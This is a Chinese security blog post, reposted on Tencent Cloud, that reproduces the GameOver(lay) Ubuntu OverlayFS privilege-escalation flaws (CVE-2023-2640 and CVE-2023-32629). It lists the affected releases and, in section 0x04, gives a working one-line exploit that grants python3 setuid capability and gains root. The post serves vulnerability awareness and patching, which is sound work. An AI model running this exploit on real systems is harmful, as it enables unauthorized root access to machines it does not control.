前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】CVE-2023-2640 Ubuntu本地权限提升

【漏洞复现】CVE-2023-2640 Ubuntu本地权限提升

作者头像
信安百科
发布2023-09-24 08:48:48
2.5K0
发布2023-09-24 08:48:48
举报
文章被收录于专栏:信安百科

0x00 前言

Ubuntu是一种基于Linux操作系统的自由软件,它以用户友好的界面和易用性而著称。

0x01 漏洞描述

Ubuntu OverlayFS 模块中已发现两个权限提升漏洞,漏洞源于 Ubuntu 对容器环境中广泛使用的 OverlayFS 模块的实现差异。

(OverlayFS 是一种联合装载文件系统实现,因其允许通过用户名称空间进行无特权访问,并且受到容易被利用的漏洞的干扰,过去曾多次受到威胁攻击者的攻击)

CVE-2023-2640 涉及某些 Ubuntu 内核,这些内核允许非特权用户在未进行适当安全检查的情况下在已安装文件上设置特权扩展属性。

第二个缺陷 CVE-2023-32629 是一个本地权限提升漏洞,在 Ubuntu 内核上执行某些操作时会跳过权限检查。

从本质上讲,GameOver(lay) 漏洞能够制作具有作用域文件功能的可执行文件,欺骗 Ubuntu 内核将其复制到具有非作用域功能的不同位置。这授予任何执行它的人类似 root 的权限。

0x02 CVE编号

CVE-2023-2640

CVE-2023-32629

0x03 影响版本

代码语言:javascript
复制
Ubuntu 23.04 (Lunar Lobster) Version 6.2.0
Ubuntu 22.10 (Kinetic Kudu) Version 5.19.0
Ubuntu 22.04 LTS (Jammy Jellyfish) Versions 5.19.0 and 6.2.0
Ubuntu 20.04 LTS (Focal Fossa) Version 5.4.0 (Only affected by CVE-2023-32629)
Ubuntu 18.04 LTS (Bionic Beaver) Version 5.4.0 (Only affected by CVE-2023-32629)
Ubuntu 16.04 ESM
Ubuntu 14.04 ESM

0x04 漏洞复现

代码语言:javascript
复制
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

0x05 参考链接

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32629

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-09-23 11:11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档